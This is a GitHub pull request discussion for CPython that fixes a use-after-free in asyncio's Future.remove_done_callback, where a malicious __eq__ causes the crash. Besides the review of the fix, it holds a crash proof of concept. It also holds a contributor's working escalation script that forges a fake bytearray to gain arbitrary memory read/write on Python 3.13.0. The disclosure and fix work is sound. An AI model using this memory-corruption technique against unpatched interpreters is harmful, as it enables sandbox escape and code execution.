- 
          
- 
                Notifications
    You must be signed in to change notification settings 
- Fork 33.2k
          gh-125966: fix UAF on fut->fut_callback0 due to an evil callback's __eq__
          #125967
        
          New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
  
    gh-125966: fix UAF on fut->fut_callback0 due to an evil callback's __eq__
  
  #125967
              Conversation
| The pure python implementation cannot crash the interpreter, so -1 on changing that, let's keep the original behaviour. | 
| PyObject *fut_callback0 = Py_NewRef(self->fut_callback0); | ||
| int cmp = PyObject_RichCompareBool(fut_callback0, fn, Py_EQ); | ||
| Py_DECREF(fut_callback0); | 
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Hmm, could you explain the issue more to me? I don't see any need to explicitly hold a reference here, because we (should) implicitly hold one by holding a reference to self.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
If you run the PoC:
import asyncio
fut = asyncio.Future()
class a:
    def __eq__(self, other):
        print("in a __eq__", self)
		print("other is", other)
        return True
    
    def __del__(self):
        print("deleting", self)
class b(a):
    def __eq__(self, other):
        print("in b __eq__")
        fut.remove_done_callback(None)
		print("None was removed")
        return NotImplemented
fut.add_done_callback(a())
fut.remove_done_callback(b())you would get:
in b __eq__
in a __eq__ <__main__.a object at 0x7f2ef037f4a0>
other is None
None was removed
deleting <__main__.a object at 0x7f2ef037f4a0>
Segmentation fault (core dumped)
If you don't hold a reference to fut_callback0, the issue is that after __eq__, the reference to fut_callback0 will be freed before completing the call because of
if (cmp == 1) {
    /* callback0 == fn */
    Py_CLEAR(self->fut_callback0);  // this clears 
    Py_CLEAR(self->fut_context0);
    cleared_callback0 = 1; 
}@Nico-Posada Please correct me if I'm wrong here!
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Yeah that's main idea. After running fut.remove_done_callback(None) self->fut_callback0 will be cleared, but then the evil function returns NotImplemented which causes PyObject_RichCompareBool to call fut_callback0's __eq__ func after fut_callback0 has been cleared.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
fwiw, here's a POC that shows how you can escalate this to malicious object creation (tested on v3.13.0 on ubuntu 24.04 x86_64)
import asyncio
fut = asyncio.Future()
class a(bytes):
    def __eq__(self, other):
        print("in a __eq__", hex(id(self)), hex(id(other)))
        return True
    
    def __del__(self):
        print("deleting", hex(id(self)))
class b(a):
    def __eq__(self, other):
        global pad
        print("in b __eq__", hex(id(self)), hex(id(other)))
        fut.remove_done_callback(None)
        del pad, other
        print("created ", hex(id(prealloc + fake_obj)))
        return NotImplemented
class Catch:
    __slots__ = ("mem",)
    def __eq__(self, other):
        global mem
        mem = self.mem
        return True
fake_ba = (
    (0x123456).to_bytes(8, 'little') +
    id(bytearray).to_bytes(8, 'little') +
    (2**63 - 1).to_bytes(8, 'little') +
    (0).to_bytes(24, 'little')
)
fake_obj = (
    (0x123456).to_bytes(8, 'little') +
    id(Catch).to_bytes(8, 'little') +
    (id(fake_ba) + bytes.__basicsize__ - 1).to_bytes(8, 'little')
)
prealloc = a(0x8050)
pad = a(0x8000)
to_corrupt = a(0x8000)
print("pad:", hex(id(pad)), "to_corrupt:", hex(id(to_corrupt)))
print("diff:", hex(id(to_corrupt) - id(pad)))
mem = None
# transfer ownership to fut
fut.add_done_callback(to_corrupt)
del to_corrupt
fut.remove_done_callback(b())
if mem is None:
    print("failed")
    exit()
print(hex(len(mem))) # => 0x7fffffffffffffff
mem[id(250) + int.__basicsize__] = 100
print(250) # => 100This reverts commit ca7fe77.
| What if we just forbid recursive callback removal at all? For example, if a dict is changed during iteration python raises  I have a feeling that recursive callbacks list modification falls in the same trap. What a user expects if  Explicit forbidding such edge cases makes the logic clearer for human understanding. Potential crash is converted into RuntimeError. What are your opinions? | 
| 
 I imagine that would make the code even more complex, extra checks would have to be added to guard and check size after each iteration, a simpler change is to just incref the callback as done here, this pattern is very common in codebase to avoid crashes. As for the behavior, I'd let it be how it is, if user messes things up it's their fault, nobody in their right mind should do something like this so I am only concerned about not crashing the interp. | 
| The check could be as simple as adding a bool flag to a future instance, checking it at the very beginning of  I don't insist though. Messy behavior can live on its own if it doesn't crash Python, agree. Should we care about the following scenario? Assume we are working with CFuture. 
 To fix this, we should check  | 
fut->fut_callback0 in _asynciomodule.cfut->fut_callback0 due to an evil callback's __eq__
      | 
 While I find it good on paper, I think we shouldn't make the module more complicate than what it is already. While I doubt someone has a good reason to mutate the list, IIRC, most of the UAFs were fixed by incrementing refcounts in general, and not by forbidding some kind of "bad" operation. I'm also wondering but how does it work if multiple threads access the future's state? isn't possible to fool the check (we may require locks for prevent this)? (or, more generally, would this approach work in the free-threaded build without additional locks and co?) [I don't know if the current implementation is perfectly fool-proofed in the free-threaded build by the way] So I'd prefer first fixing the interpreter that way and maybe we could come back with a more intricate solution later if needs arise? | 
        
          
                Modules/_asynciomodule.c
              
                Outdated
          
        
      | // Beware: An evil PyObject_RichCompareBool could change fut_callback0 | ||
| // (see https://github.com/python/cpython/issues/125789 for details) | ||
| // In addition, the reference to self->fut_callback0 may be cleared, | ||
| // so we need to temporarily hold it explicitly. | 
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This comment feels a bit confusing. I had a hard time figuring where in that issue to look for the example involving callback0. I also had a hard time understanding that returning NotImplemented will cause a second rich comparison to be invoked (by the first one) after the first argument to the first one has been DECREF'ed. (Thanks to the long comments below I now understand this -- good catch all!). Maybe deep-link to a specific comment in the issue? Or maybe just explain that if fn's __eq__ is evil enough, it can cause the first arg to PyObject_RichCompareBool  be freed before a recursive PyObject_RichCompareBool  calls is made with that same arg.
But now I am thinking that this is really a general weakness in PyObject_RichCompareBool that should be fixed there! (Maybe in do_richcompare.) Thoughts?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Or maybe just explain that if fn's eq is evil enough, it can cause the first arg to PyObject_RichCompareBool be freed before a recursive PyObject_RichCompareBool calls is made with that same arg.
That's a good way to phrase it; I also didn't really know how to say it properly. Alternatively, I think a link to the comment #125967 (comment) would be fine as well. We can also say both so
that readers don't need to open the link if you want (and to give a bit of context as for the other comments)
But now I am thinking that this is really a general weakness in PyObject_RichCompareBool that should be fixed there! (Maybe in do_richcompare.) Thoughts?
Unfortunately, I'm not sure we can always make it work. It would be great if PyObject_RichCompareBool was smart enough to figure it out but there are cases when it would not be straightforward (for instance: #119004 (comment)). Note that the evil __eq__ works in this specific situation because we can mutate the operands being compared to trigger the UAF but that's not always the case I think =/
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
By the way, there are at least two ways of fixing a UAF like this: either you incref/decref eagerly or you transfer ownership. The latter is only done if you'll anyway clear the ref after the call and is cheaper than the former, but in general, we need to do the latter. Since __eq__ is a common operation, we try to be as efficient possible.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Ok, I can buy the patch because of its simplicity.
Thanks!
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
There are merge conflicts
| A Python core developer has requested some changes be made to your pull request before we can consider merging it. If you could please address their requests along with any other requests in other reviews from core developers that would be appreciated. Once you have made the requested changes, please leave a comment on this pull request containing the phrase  | 
      
        
              This comment was marked as resolved.
        
        
      
    
  This comment was marked as resolved.
| I have made the requested changes; please review again. | 
| Thanks for making the requested changes! @kumaraditya303, @asvetlov: please review the changes made to this pull request. | 
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Okay, looks good! Is anyone here able to merge? (@kumaraditya303 are you happy with this?) Otherwise I can do it.
| Thanks @picnixz for the PR, and @kumaraditya303 for merging it 🌮🎉.. I'm working now to backport this PR to: 3.12, 3.13. | 
… evil callback's `__eq__` in asyncio (pythonGH-125967) (cherry picked from commit ed5059e) Co-authored-by: Bénédikt Tran <[email protected]>
… evil callback's `__eq__` in asyncio (pythonGH-125967) (cherry picked from commit ed5059e) Co-authored-by: Bénédikt Tran <[email protected]>
| GH-126047 is a backport of this pull request to the 3.13 branch. | 
| GH-126048 is a backport of this pull request to the 3.12 branch. | 
… evil callback's `__eq__` in asyncio (python#125967)
… evil callback's `__eq__` in asyncio (python#125967)
fut->fut_callback0with evil__eq__in_asynciomodule.c#125966